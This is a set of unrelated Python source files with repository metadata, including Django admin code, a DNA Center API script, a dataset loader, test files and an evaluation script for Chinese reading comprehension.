assert SERIAL_COMM_NUM_CHANNELS_PER_SENSOR_CY == SERIAL_COMM_NUM_CHANNELS_PER_SENSOR
def test_beta_2_mappings():
assert SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE == {
"A": {"X": 0, "Y": 1, "Z": 2},
"B": {"X": 3, "Y": 4, "Z": 5},
"C": {"X": 6, "Y": 7, "Z": 8},
}
assert SERIAL_COMM_WELL_IDX_TO_MODULE_ID == {
well_idx: module_id for module_id, well_idx in SERIAL_COMM_MODULE_ID_TO_WELL_IDX.items()
}
assert SERIAL_COMM_MODULE_ID_TO_WELL_IDX == {
module_id: (module_id - 1) % 6 * 4 + (module_id - 1) // 6 for module_id in range(1, 25)
}
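# A few values worked out from the formula above (illustrative only):
# module_id 1 -> well 0, module_id 2 -> well 4, module_id 6 -> well 20,
# module_id 7 -> well 1, module_id 24 -> well 23.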
for well_idx in range(24):
module_id = SERIAL_COMM_WELL_IDX_TO_MODULE_ID[well_idx]
well_idx_from_module_id = SERIAL_COMM_MODULE_ID_TO_WELL_IDX[module_id]
assert well_idx_from_module_id == well_idx
| 45.767528
| 228
| 0.804886
|
4e8249cc4359ee69945ec99c2d2b5f6be3bd91f7
| 94
|
py
|
Python
|
apps.py
|
lowryel/Blog
|
964af1d6574b33cf9781ecfa162ab1362f89784c
|
[
"Apache-2.0"
] | null | null | null |
apps.py
|
lowryel/Blog
|
964af1d6574b33cf9781ecfa162ab1362f89784c
|
[
"Apache-2.0"
] | null | null | null |
apps.py
|
lowryel/Blog
|
964af1d6574b33cf9781ecfa162ab1362f89784c
|
[
"Apache-2.0"
] | null | null | null |
from django.apps import AppConfig
class TourappConfig(AppConfig):
name = 'tourapp'
| 15.666667
| 34
| 0.712766
|
8f688b7fd32e5022ba85cf023e3cad122469d5a9
| 963
|
py
|
Python
|
letter/admin.py
|
watchdogpolska/django-civil-list
|
f486d9a8595bcfa3b402e608324f79f793f8e960
|
[
"BSD-3-Clause"
] | null | null | null |
letter/admin.py
|
watchdogpolska/django-civil-list
|
f486d9a8595bcfa3b402e608324f79f793f8e960
|
[
"BSD-3-Clause"
] | 1
|
2015-08-04T14:24:10.000Z
|
2015-08-04T14:24:10.000Z
|
letter/admin.py
|
watchdogpolska/django-civil-list
|
f486d9a8595bcfa3b402e608324f79f793f8e960
|
[
"BSD-3-Clause"
] | null | null | null |
from django import forms
from django.contrib import admin
# Register your models here.
from .models import Category, Person, Letter
from ckeditor.widgets import CKEditorWidget
class CategoryAdmin(admin.ModelAdmin):
list_display = (u'id', 'name')
search_fields = ('name',)
admin.site.register(Category, CategoryAdmin)
class PersonAdmin(admin.ModelAdmin):
list_display = (u'id', 'name', 'email', 'category')
list_filter = ('category',)
search_fields = ('name',)
admin.site.register(Person, PersonAdmin)
class LetterAdminForm(forms.ModelForm):
content = forms.CharField(widget=CKEditorWidget())
class Meta:
fields = ('id', 'name', 'title', 'content', 'category')
model = Letter
class LetterAdmin(admin.ModelAdmin):
list_display = (u'id', 'name', 'title', 'content', 'category')
list_filter = ('category',)
search_fields = ('name',)
form = LetterAdminForm
admin.site.register(Letter, LetterAdmin)
| 26.75
| 66
| 0.697819
|
bb4fe4add4ad61cf57f220fc4fbd3feb77614ae3
| 161
|
py
|
Python
|
alvi/tests/pages/home.py
|
alviproject/alvi
|
ec77919a546c11c46b178a21236792f8b0d95cbd
|
[
"MIT"
] | 10
|
2015-06-01T09:11:33.000Z
|
2018-03-02T13:52:46.000Z
|
alvi/tests/pages/home.py
|
alviproject/alvi
|
ec77919a546c11c46b178a21236792f8b0d95cbd
|
[
"MIT"
] | null | null | null |
alvi/tests/pages/home.py
|
alviproject/alvi
|
ec77919a546c11c46b178a21236792f8b0d95cbd
|
[
"MIT"
] | 5
|
2015-09-17T17:34:16.000Z
|
2019-09-04T10:50:29.000Z
|
from selenium.webdriver.common.by import By
from . import base
class Home(base.Page):
scene_links = base.make_elements(By.CSS_SELECTOR, "ul.scenes li a")
| 20.125
| 71
| 0.751553
|
b275a83d1ad8ab51060de85b662828f6f4f3363f
| 4,146
|
py
|
Python
|
intro-dnac/dnac-nbapi-hello-world/dnac-nbapi-hello-world.py
|
borisski/dnav3-code
|
9e12accb5be7e66fff5aabfdebc5ef282c687351
|
[
"MIT"
] | 1
|
2020-07-25T09:24:38.000Z
|
2020-07-25T09:24:38.000Z
|
intro-dnac/dnac-nbapi-hello-world/dnac-nbapi-hello-world.py
|
borisski/dnav3-code
|
9e12accb5be7e66fff5aabfdebc5ef282c687351
|
[
"MIT"
] | 8
|
2020-02-05T14:17:32.000Z
|
2021-09-23T23:27:46.000Z
|
intro-dnac/dnac-nbapi-hello-world/dnac-nbapi-hello-world.py
|
ljm625/dnav3-code
|
833c2c05401fbe84529d51dc1eb597c10b6615c9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""DNAv3 - DNAC Northbound API - Hands on exercise 01
In this exercise we create helper functions to get an auth token
from DNAC - get_auth_token() and also get_url(), create_url() and
list_network_devices() to get a list of all network devices managed
by DNA Center. In the main function we extract some data we find useful
and pretty print the result.
Copyright (c) 2018 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os
import sys
import json
import requests
from requests.auth import HTTPBasicAuth
requests.packages.urllib3.disable_warnings()
# Get the absolute path for the directory where this file is located "here"
here = os.path.abspath(os.path.dirname(__file__))
# Get the absolute path for the project / repository root
project_root = os.path.abspath(os.path.join(here, "../.."))
# Extend the system path to include the project root and import the env files
sys.path.insert(0, project_root)
import env_lab # noqa
#import env_user # noqa
DNAC = env_lab.DNA_CENTER['host']
DNAC_USER = env_lab.DNA_CENTER['username']
DNAC_PASSWORD = env_lab.DNA_CENTER['password']
DNAC_PORT = env_lab.DNA_CENTER['port']
# -------------------------------------------------------------------
# Helper functions
# -------------------------------------------------------------------
def get_auth_token(controller_ip=DNAC, username=DNAC_USER, password=DNAC_PASSWORD):
""" Authenticates with controller and returns a token to be used in subsequent API invocations
"""
login_url = "https://{0}/dna/system/api/v1/auth/token".format(controller_ip, DNAC_PORT)
result = requests.post(url=login_url, auth=HTTPBasicAuth(DNAC_USER, DNAC_PASSWORD), verify=False)
result.raise_for_status()
token = result.json()["Token"]
return {
"controller_ip": controller_ip,
"token": token
}
def create_url(path, controller_ip=DNAC):
""" Helper function to create a DNAC API endpoint URL
"""
return "https://%s/dna/intent/api/v1/%s" % (controller_ip, path)
def get_url(url):
url = create_url(path=url)
print(url)
token = get_auth_token()
headers = {'X-auth-token': token['token']}
try:
response = requests.get(url, headers=headers, verify=False)
except requests.exceptions.RequestException as cerror:
print("Error processing request", cerror)
sys.exit(1)
return response.json()
def list_network_devices():
return get_url("network-device")
if __name__ == "__main__":
response = list_network_devices()
print("{0:42}{1:17}{2:12}{3:18}{4:12}{5:16}{6:15}".
format("hostname","mgmt IP","serial",
"platformId","SW Version","role","Uptime"))
for device in response['response']:
uptime = "N/A" if device['upTime'] is None else device['upTime']
print("{0:42}{1:17}{2:12}{3:18}{4:12}{5:16}{6:15}".
format(device['hostname'],
device['managementIpAddress'],
device['serialNumber'],
device['platformId'],
device['softwareVersion'],
device['role'],uptime))
| 37.017857
| 101
| 0.686686
|
ddd97ca973f7195e13786da55465bb43b53f019b
| 5,388
|
py
|
Python
|
datasets/xlsum/xlsum.py
|
xcfcode/DataLab
|
d1a310de4986cb704b1fe3dea859452b8c14fc71
|
[
"Apache-2.0"
] | null | null | null |
datasets/xlsum/xlsum.py
|
xcfcode/DataLab
|
d1a310de4986cb704b1fe3dea859452b8c14fc71
|
[
"Apache-2.0"
] | null | null | null |
datasets/xlsum/xlsum.py
|
xcfcode/DataLab
|
d1a310de4986cb704b1fe3dea859452b8c14fc71
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2022 The HuggingFace datasets Authors, DataLab Authors and the current dataset script contributor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""XL-Sum abstractive summarization dataset."""
import json
import os
import datalabs
from datalabs.tasks import Summarization
_CITATION = """\
@inproceedings{hasan-etal-2021-xl,
title = "{XL}-Sum: Large-Scale Multilingual Abstractive Summarization for 44 Languages",
author = "Hasan, Tahmid and
Bhattacharjee, Abhik and
Islam, Md. Saiful and
Mubasshir, Kazi and
Li, Yuan-Fang and
Kang, Yong-Bin and
Rahman, M. Sohel and
Shahriyar, Rifat",
booktitle = "Findings of the Association for Computational Linguistics: ACL-IJCNLP 2021",
month = aug,
year = "2021",
address = "Online",
publisher = "Association for Computational Linguistics",
url = "https://aclanthology.org/2021.findings-acl.413",
pages = "4693--4703",
}
"""
_DESCRIPTION = """\
We present XLSum, a comprehensive and diverse dataset comprising 1.35 million professionally
annotated article-summary pairs from BBC, extracted using a set of carefully designed heuristics.
The dataset covers 45 languages ranging from low to high-resource, for many of which no
public dataset is currently available. XL-Sum is highly abstractive, concise,
and of high quality, as indicated by human and intrinsic evaluation.
"""
_HOMEPAGE = "https://github.com/csebuetnlp/xl-sum"
_LICENSE = "Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (CC BY-NC-SA 4.0)"
_URL = "https://huggingface.co/datasets/csebuetnlp/xlsum/resolve/main/data/{}_XLSum_v{}.tar.bz2"
_LANGUAGES = [
"oromo",
"french",
"amharic",
"arabic",
"azerbaijani",
"bengali",
"burmese",
"chinese_simplified",
"chinese_traditional",
"welsh",
"english",
"kirundi",
"gujarati",
"hausa",
"hindi",
"igbo",
"indonesian",
"japanese",
"korean",
"kyrgyz",
"marathi",
"spanish",
"scottish_gaelic",
"nepali",
"pashto",
"persian",
"pidgin",
"portuguese",
"punjabi",
"russian",
"serbian_cyrillic",
"serbian_latin",
"sinhala",
"somali",
"swahili",
"tamil",
"telugu",
"thai",
"tigrinya",
"turkish",
"ukrainian",
"urdu",
"uzbek",
"vietnamese",
"yoruba",
]
class Xlsum(datalabs.GeneratorBasedBuilder):
VERSION = datalabs.Version("2.0.0")
BUILDER_CONFIGS = [
datalabs.BuilderConfig(
name="{}".format(lang),
version=datalabs.Version("2.0.0")
)
for lang in _LANGUAGES
]
def _info(self):
return datalabs.DatasetInfo(
description=_DESCRIPTION,
features=datalabs.Features(
{
"id": datalabs.Value("string"),
"url": datalabs.Value("string"),
"title": datalabs.Value("string"),
"summary": datalabs.Value("string"),
"text": datalabs.Value("string"),
}
),
supervised_keys=None,
homepage=_HOMEPAGE,
citation=_CITATION,
license=_LICENSE,
version=self.VERSION,
task_templates=[Summarization(
text_column="text",
summary_column="summary"),
],
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
lang = str(self.config.name)
url = _URL.format(lang, self.VERSION.version_str[:-2])
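# Illustrative example of the resolved URL: with lang="english" and
# version 2.0.0 the line above yields ".../data/english_XLSum_v2.0.tar.bz2"
# under the _URL base.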
data_dir = dl_manager.download_and_extract(url)
return [
datalabs.SplitGenerator(
name=datalabs.Split.TRAIN,
gen_kwargs={
"filepath": os.path.join(data_dir, lang + "_train.jsonl"),
},
),
datalabs.SplitGenerator(
name=datalabs.Split.TEST,
gen_kwargs={
"filepath": os.path.join(data_dir, lang + "_test.jsonl"),
},
),
datalabs.SplitGenerator(
name=datalabs.Split.VALIDATION,
gen_kwargs={
"filepath": os.path.join(data_dir, lang + "_val.jsonl"),
},
),
]
def _generate_examples(self, filepath):
"""Yields examples as (key, example) tuples."""
with open(filepath, encoding="utf-8") as f:
for idx_, row in enumerate(f):
data = json.loads(row)
yield idx_, {
"id": data["id"],
"url": data["url"],
"title": data["title"],
"summary": data["summary"],
"text": data["text"],
}
| 30.788571
| 110
| 0.584076
|
752561c0080e8b2bf085141977a3a20bddfe3986
| 716
|
py
|
Python
|
tests/test_pipeline/components/regression/test_gradient_boosting.py
|
jianzhnie/AutoTabular
|
fb407300adf97532a26d33f7442d2a606fa30512
|
[
"Apache-2.0"
] | 48
|
2021-09-06T08:09:26.000Z
|
2022-03-28T13:02:54.000Z
|
tests/test_pipeline/components/regression/test_gradient_boosting.py
|
Fanxingye/Autotabular
|
d630c78290a52f8c73885afb16884e18135c34f6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pipeline/components/regression/test_gradient_boosting.py
|
Fanxingye/Autotabular
|
d630c78290a52f8c73885afb16884e18135c34f6
|
[
"Apache-2.0"
] | 7
|
2021-09-23T07:28:46.000Z
|
2021-10-02T21:15:18.000Z
|
import sklearn.ensemble
from autotabular.pipeline.components.regression.gradient_boosting import GradientBoosting
from .test_base import BaseRegressionComponentTest
class GradientBoostingComponentTest(BaseRegressionComponentTest):
__test__ = True
res = dict()
res['default_boston'] = 0.7491382574462079
res['default_boston_iterative'] = 0.7491382574462079
res['default_boston_sparse'] = None
res['boston_n_calls'] = 9
res['default_diabetes'] = 0.2872735632261877
res['default_diabetes_iterative'] = 0.2872735632261877
res['default_diabetes_sparse'] = None
res['diabetes_n_call'] = 11
sk_mod = sklearn.ensemble.GradientBoostingRegressor
module = GradientBoosting
| 31.130435
| 89
| 0.772346
|
1eadd48490f71cd779184bfe1b90fe2b1caac783
| 760
|
py
|
Python
|
readthedocs/profiles/urls/private.py
|
espdev/readthedocs.org
|
5052a06feae56fe5efc9b4c57c430de6007cb7c1
|
[
"MIT"
] | null | null | null |
readthedocs/profiles/urls/private.py
|
espdev/readthedocs.org
|
5052a06feae56fe5efc9b4c57c430de6007cb7c1
|
[
"MIT"
] | null | null | null |
readthedocs/profiles/urls/private.py
|
espdev/readthedocs.org
|
5052a06feae56fe5efc9b4c57c430de6007cb7c1
|
[
"MIT"
] | null | null | null |
from django.conf.urls import patterns, url
from readthedocs.core.forms import UserProfileForm
urlpatterns = patterns('',
url(r'^create/', 'readthedocs.profiles.views.create_profile',
{
'form_class': UserProfileForm,
},
name='profiles_profile_create'),
url(r'^edit/', 'readthedocs.profiles.views.edit_profile',
{
'form_class': UserProfileForm,
'template_name': 'profiles/private/edit_profile.html',
},
name='profiles_profile_edit'),
)
| 42.222222 | 85 | 0.443421 |
36d6d7f168f4b82d7ab64af7de7fa39ba918129c | 1,096 | py | Python | timewave/__init__.py | pbrisk/timewave | 26c81257264079cf11d9644bae02bf9efae3a006 | ["Apache-2.0"] | null | null | null | timewave/__init__.py | pbrisk/timewave | 26c81257264079cf11d9644bae02bf9efae3a006 | ["Apache-2.0"] | null | null | null | timewave/__init__.py | pbrisk/timewave | 26c81257264079cf11d9644bae02bf9efae3a006 | ["Apache-2.0"] | 2 | 2017-04-10T13:40:41.000Z | 2018-05-22T14:04:43.000Z |
# -*- coding: utf-8 -*-
# timewave
# --------
# timewave, a stochastic process evolution simulation engine in python.
#
# Author: sonntagsgesicht, based on a fork of Deutsche Postbank [pbrisk]
# Version: 0.6, copyright Wednesday, 18 September 2019
# Website: https://github.com/sonntagsgesicht/timewave
# License: Apache License 2.0 (see LICENSE file)
__doc__ = 'timewave, a stochastic process evolution simulation engine in python.'
__license__ = 'Apache License 2.0'
__author__ = 'sonntagsgesicht, based on a fork of Deutsche Postbank [pbrisk]'
__email__ = 'sonntagsgesicht@icloud.com'
__url__ = 'https://github.com/sonntagsgesicht/' + __name__
__date__ = 'Wednesday, 18 September 2019'
__version__ = '0.6'
__dev_status__ = '4 - Beta'
__dependencies__ = ('dill', 'numpy', 'scipy')
__dependency_links__ = ()
__data__ = ()
__scripts__ = ()
import dill as pickle # enable proper pickle for lambda expressions
from .engine import *
from .producers import *
from .consumers import *
from .stochasticprocess import *
from .stochasticproducer import *
from .stochasticconsumer import *
| 29.621622 | 81 | 0.740876 |
073acd303bb938223a4c684811de654defd0a63c | 6,228 | py | Python | simplify/explorer/components.py | WithPrecedent/ml_funnel | 5302da8bf4944ac518d22cc37c181e5a09baaabe | ["Apache-2.0"] | null | null | null | simplify/explorer/components.py | WithPrecedent/ml_funnel | 5302da8bf4944ac518d22cc37c181e5a09baaabe | ["Apache-2.0"] | null | null | null | simplify/explorer/components.py | WithPrecedent/ml_funnel | 5302da8bf4944ac518d22cc37c181e5a09baaabe | ["Apache-2.0"] | 2 | 2019-10-07T14:36:26.000Z | 2020-02-23T00:50:20.000Z |
"""
explorer.components:
Corey Rayburn Yung <coreyrayburnyung@gmail.com>
Copyright 2020, Corey Rayburn Yung
License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0)
Contents:
"""
from __future__ import annotations
import dataclasses
from types import ModuleType
from typing import (Any, Callable, ClassVar, Dict, Iterable, List, Mapping,
Optional, Sequence, Tuple, Type, Union)
import simplify
from . import base
@dataclasses.dataclass
class Test(SimpleDirector):
"""Applies statistical tests to data.
Args:
name (Optional[str]): designates the name of the class used for internal
referencing throughout siMpLify. If the class needs settings from
the shared 'Idea' instance, 'name' should match the appropriate
section name in 'Idea'. When subclassing, it is a good idea to use
the same 'name' attribute as the base class for effective
coordination between siMpLify classes. 'name' is used instead of
__class__.__name__ to make such subclassing easier. If 'name' is not
provided, __class__.__name__.lower() is used instead.
"""
name: Optional[str] = 'tester'
def __post_init__(self) -> None:
super().__post_init__()
return self
def draft(self) -> None:
super().draft()
        self._options = {
            'ks_distribution': ['scipy.stats', 'ks_2samp'],
            'ks_goodness': ['scipy.stats', 'kstest'],
            'kurtosis_test': ['scipy.stats', 'kurtosistest'],
            'normal': ['scipy.stats', 'normaltest'],
            'pearson': ['scipy.stats', 'pearsonr']}
        return self
def publish(self):
self.runtime_parameters = {
'y_true': getattr(recipe.dataset, 'y_' + self.data_to_review),
'y_pred': recipe.predictions}
super().implement()
return self
@dataclasses.dataclass
class Summarize(SimpleDirector):
"""Summarizes data.
Args:
name (Optional[str]): designates the name of the class used for internal
referencing throughout siMpLify. If the class needs settings from
the shared 'Idea' instance, 'name' should match the appropriate
section name in 'Idea'. When subclassing, it is a good idea to use
the same 'name' attribute as the base class for effective
coordination between siMpLify classes. 'name' is used instead of
__class__.__name__ to make such subclassing easier. If 'name' is not
provided, __class__.__name__.lower() is used instead.
"""
name: str = 'summarizer'
def __post_init__(self) -> None:
super().__post_init__()
return self
""" Core siMpLify Methods """
def draft(self) -> None:
"""Sets options for Summarize class."""
super().draft()
self._options = SimpleRepository(contents = {
'count': Option(
name = 'count',
module = 'numpy.ndarray',
algorithm = 'size'),
'min': Option(
name = 'minimum',
module = 'numpy',
algorithm = 'nanmin'),
'q1': Option(
name = 'quantile1',
module = 'numpy',
algorithm = 'nanquantile',
required = {'q': 0.25}),
'median': Option(
name = 'median',
module = 'numpy',
algorithm = 'nanmedian'),
'q3': Option(
name = 'quantile3',
module = 'numpy',
algorithm = 'nanquantile',
                required = {'q': 0.75}),
'max': Option(
                name = 'maximum',
module = 'numpy',
algorithm = 'nanmax'),
'mad': Option(
                name = 'median absolute deviation',
module = 'scipy.stats',
algorithm = 'median_absolute_deviation',
required = {'nan_policy': 'omit'}),
'mean': Option(
name = 'mean',
module = 'numpy',
algorithm = 'nanmean'),
'std': Option(
name = 'standard deviation',
module = 'numpy',
algorithm = 'nanstd'),
'standard_error': Option(
name = 'standard_error',
module = 'scipy.stats',
algorithm = 'sem',
required = {'nan_policy': 'omit'}),
'geometric_mean': Option(
name = 'geometric_mean',
module = 'scipy.stats',
algorithm = 'gmean'),
'geometric_std': Option(
name = 'geometric_standard_deviation',
module = 'scipy.stats',
algorithm = 'gstd'),
'harmonic_mean': Option(
name = 'harmonic_mean',
module = 'scipy.stats',
algorithm = 'hmean'),
'mode': Option(
name = 'mode',
module = 'scipy.stats',
algorithm = 'mode',
required = {'nan_policy': 'omit'}),
'sum': Option(
name = 'sum',
module = 'numpy',
algorithm = 'nansum'),
'kurtosis': Option(
name = 'kurtosis',
module = 'scipy.stats',
algorithm = 'kurtosis',
required = {'nan_policy': 'omit'}),
'skew': Option(
name = 'skew',
module = 'scipy.stats',
algorithm = 'skew',
required = {'nan_policy': 'omit'}),
'variance': Option(
name = 'variance',
module = 'numpy',
algorithm = 'nanvar'),
'variation': Option(
name = 'variation',
module = 'scipy.stats',
algorithm = 'variation',
required = {'nan_policy': 'omit'}),
'unique': Option(
name = 'unique_values',
module = 'numpy',
algorithm = 'nunique')}
return self
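Each Option above pairs a module path with an attribute name. A minimal sketch of how such a pair is commonly resolved to a callable at run time (the helper name is ours, not siMpLify's API, and it assumes numpy is installed):
from importlib import import_module

def resolve(module_path, attribute):
    """Import `module_path` lazily and return the attribute named by `attribute`."""
    return getattr(import_module(module_path), attribute)

nanmean = resolve('numpy', 'nanmean')      # same object as numpy.nanmean
print(nanmean([1.0, 2.0, float('nan')]))   # 1.5, the NaN is ignored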
| 35.186441 | 80 | 0.506423 |
66ddd68b0f1ac6dd2f975a0689ce68fe6dbb0785 | 4,414 | py | Python | best_cn_finetune/squad-style-data/cmrc2018_evaluate.py | you-know-who-2017/QA_MRC | 323591995ac4ca0ca39e6101f6ff1c6f88104bc8 | ["MIT"] | null | null | null | best_cn_finetune/squad-style-data/cmrc2018_evaluate.py | you-know-who-2017/QA_MRC | 323591995ac4ca0ca39e6101f6ff1c6f88104bc8 | ["MIT"] | null | null | null | best_cn_finetune/squad-style-data/cmrc2018_evaluate.py | you-know-who-2017/QA_MRC | 323591995ac4ca0ca39e6101f6ff1c6f88104bc8 | ["MIT"] | null | null | null |
'''
Author: geekli
Date: 2020-12-28 15:51:58
LastEditTime: 2020-12-28 15:52:08
LastEditors: your name
Description:
FilePath: \QA_MRC\squad-style-data\cmrc2018_evaluate.py
'''
# -*- coding: utf-8 -*-
'''
Evaluation script for CMRC 2018
version: v5 - special
Note:
v5 - special: Evaluate on SQuAD-style CMRC 2018 Datasets
v5: formatted output, add usage description
v4: fixed segmentation issues
'''
from __future__ import print_function
from collections import Counter, OrderedDict
import string
import re
import argparse
import json
import sys
import nltk
import pdb
# split Chinese with English
def mixed_segmentation(in_str, rm_punc=False):
    in_str = str(in_str).lower().strip()
segs_out = []
temp_str = ""
sp_char = ['-',':','_','*','^','/','\\','~','`','+','=',
',','。',':','?','!','“','”',';','’','《','》','……','·','、',
'「','」','(',')','-','~','『','』']
for char in in_str:
if rm_punc and char in sp_char:
continue
        if re.search(r'[\u4e00-\u9fa5]', char) or char in sp_char:
if temp_str != "":
ss = nltk.word_tokenize(temp_str)
segs_out.extend(ss)
temp_str = ""
segs_out.append(char)
else:
temp_str += char
#handling last part
if temp_str != "":
ss = nltk.word_tokenize(temp_str)
segs_out.extend(ss)
return segs_out
# remove punctuation
def remove_punctuation(in_str):
    in_str = str(in_str).lower().strip()
sp_char = ['-',':','_','*','^','/','\\','~','`','+','=',
',','。',':','?','!','“','”',';','’','《','》','……','·','、',
'「','」','(',')','-','~','『','』']
out_segs = []
for char in in_str:
if char in sp_char:
continue
else:
out_segs.append(char)
return ''.join(out_segs)
# find longest common string
def find_lcs(s1, s2):
m = [[0 for i in range(len(s2)+1)] for j in range(len(s1)+1)]
mmax = 0
p = 0
for i in range(len(s1)):
for j in range(len(s2)):
if s1[i] == s2[j]:
m[i+1][j+1] = m[i][j]+1
if m[i+1][j+1] > mmax:
mmax=m[i+1][j+1]
p=i+1
return s1[p-mmax:p], mmax
#
def evaluate(ground_truth_file, prediction_file):
f1 = 0
em = 0
total_count = 0
skip_count = 0
for instance in ground_truth_file["data"]:
#context_id = instance['context_id'].strip()
#context_text = instance['context_text'].strip()
for para in instance["paragraphs"]:
for qas in para['qas']:
total_count += 1
query_id = qas['id'].strip()
query_text = qas['question'].strip()
answers = [x["text"] for x in qas['answers']]
if query_id not in prediction_file:
sys.stderr.write('Unanswered question: {}\n'.format(query_id))
skip_count += 1
continue
                prediction = str(prediction_file[query_id])
f1 += calc_f1_score(answers, prediction)
em += calc_em_score(answers, prediction)
f1_score = 100.0 * f1 / total_count
em_score = 100.0 * em / total_count
return f1_score, em_score, total_count, skip_count
def calc_f1_score(answers, prediction):
f1_scores = []
for ans in answers:
ans_segs = mixed_segmentation(ans, rm_punc=True)
prediction_segs = mixed_segmentation(prediction, rm_punc=True)
lcs, lcs_len = find_lcs(ans_segs, prediction_segs)
if lcs_len == 0:
f1_scores.append(0)
continue
precision = 1.0*lcs_len/len(prediction_segs)
recall = 1.0*lcs_len/len(ans_segs)
f1 = (2*precision*recall)/(precision+recall)
f1_scores.append(f1)
return max(f1_scores)
def calc_em_score(answers, prediction):
em = 0
for ans in answers:
ans_ = remove_punctuation(ans)
prediction_ = remove_punctuation(prediction)
if ans_ == prediction_:
em = 1
break
return em
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Evaluation Script for CMRC 2018')
parser.add_argument('dataset_file', help='Official dataset file')
parser.add_argument('prediction_file', help='Your prediction File')
args = parser.parse_args()
ground_truth_file = json.load(open(args.dataset_file, 'rb'))
prediction_file = json.load(open(args.prediction_file, 'rb'))
F1, EM, TOTAL, SKIP = evaluate(ground_truth_file, prediction_file)
AVG = (EM+F1)*0.5
output_result = OrderedDict()
output_result['AVERAGE'] = '%.3f' % AVG
output_result['F1'] = '%.3f' % F1
output_result['EM'] = '%.3f' % EM
output_result['TOTAL'] = TOTAL
output_result['SKIP'] = SKIP
output_result['FILE'] = args.prediction_file
print(json.dumps(output_result))
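The F1 above is precision/recall computed over the longest common substring of answer and prediction. A small worked example of the same arithmetic (Python 3; the sample strings are made up for illustration):
def lcs_len(a, b):
    """Length of the longest common substring of two sequences (dynamic programming)."""
    table = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    best = 0
    for i, ca in enumerate(a):
        for j, cb in enumerate(b):
            if ca == cb:
                table[i + 1][j + 1] = table[i][j] + 1
                best = max(best, table[i + 1][j + 1])
    return best

answer, prediction = "北京大学", "在北京大学读书"
lcs = lcs_len(answer, prediction)                      # 4
precision, recall = lcs / len(prediction), lcs / len(answer)
print(2 * precision * recall / (precision + recall))   # ~0.727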
| 27.416149 | 80 | 0.651337 |
6bb8d3ef5b2c5846e402829fbe273dafddc4507d | 771 | py | Python | cansi-pattern-state/w/v/tStateState_h.py | lopesivan/cansi-pattern | d41e379e728682ed41863104984e05221d347d8e | ["Apache-2.0"] | null | null | null | cansi-pattern-state/w/v/tStateState_h.py | lopesivan/cansi-pattern | d41e379e728682ed41863104984e05221d347d8e | ["Apache-2.0"] | null | null | null | cansi-pattern-state/w/v/tStateState_h.py | lopesivan/cansi-pattern | d41e379e728682ed41863104984e05221d347d8e | ["Apache-2.0"] | null | null | null |
"""Classe de template."""
from .factory import Factory
class TStateState_h(Factory):
"""Classe de template."""
def __init__(self, data_model, template_name, index):
Factory.__init__(self, template_name)
self.data_model = data_model
self.tmpl.index = index
self.tmpl.name = "StateState_h"
self.tmpl.state = data_model['state']
def put(self):
fileName = "%sState.h" % self.tmpl.state['states'][self.tmpl.index]['name'].capitalize()
print ("File: %s" % fileName)
        print(self.tmpl)
def save(self):
fileName = "%sState.h" % self.tmpl.state['states'][self.tmpl.index]['name'].capitalize()
print ("Save File: %s" % fileName)
open(fileName, 'w').write(str(self.tmpl))
| 27.535714 | 96 | 0.616083 |
09d29d0bee066d1fea8e5591ba589a403c537bb4 | 2,905 | py | Python | deps/v8/test/intl/testcfg.py | WigWagCo/node | e6e85cbab339699420e4fb7ce4de9b0ba8d58d18 | ["Artistic-2.0"] | 2 | 2015-03-16T01:58:21.000Z | 2021-06-12T05:39:52.000Z | deps/v8/test/intl/testcfg.py | hafeez-syed/node | 5b230007adba91163a2f49dbdd9a16d5834fd322 | ["Artistic-2.0"] | null | null | null | deps/v8/test/intl/testcfg.py | hafeez-syed/node | 5b230007adba91163a2f49dbdd9a16d5834fd322 | ["Artistic-2.0"] | 1 | 2021-03-15T17:23:59.000Z | 2021-03-15T17:23:59.000Z |
# Copyright 2013 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
